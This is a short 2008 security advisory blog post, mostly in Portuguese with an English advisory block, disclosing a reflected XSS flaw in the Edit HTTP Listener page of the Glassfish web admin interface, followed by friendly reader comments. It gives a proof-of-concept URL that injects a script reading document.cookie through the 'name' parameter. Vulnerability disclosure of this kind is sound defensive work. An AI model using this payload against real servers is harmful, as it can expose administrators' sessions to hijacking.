XSS – Glassfish Web Admin Interface (Sun Java System Application
Bom senhores, essa e mais uma dentro de uma interface de adminsitracao. mais um problema de validacao de entradas 🙂
Abracos! 🙂
==============================
XSS – Glassfish Web Admin Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )
==============================
Author: Eduardo Neves a.k.a _eth0_
Date: 10 june 2008
Site: https://webappsecurity.wordpress.com
==============================
APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/
==============================
IMPACT: XSS, XSRF, etc.
Severity: Low (or not?)
==============================
Descrition:
This vulnerability was found in Edit HTTP Listener section in
Glassfish web admin interface.
This is a vulnerable URL:
http://%5BHOSTNAME%5D:4848/configuration/httpListenerEdit.jsf?name=<script>a
lert(document.cookie);</script>&configName=server-config
AAEAEAEA…… boa!! +1 duuuuu
Você é o cara!!! kkk… Abração Eduardo! 🙂
Comentário do Larcher não vale. É o fã número um do Dudu.
hehehehe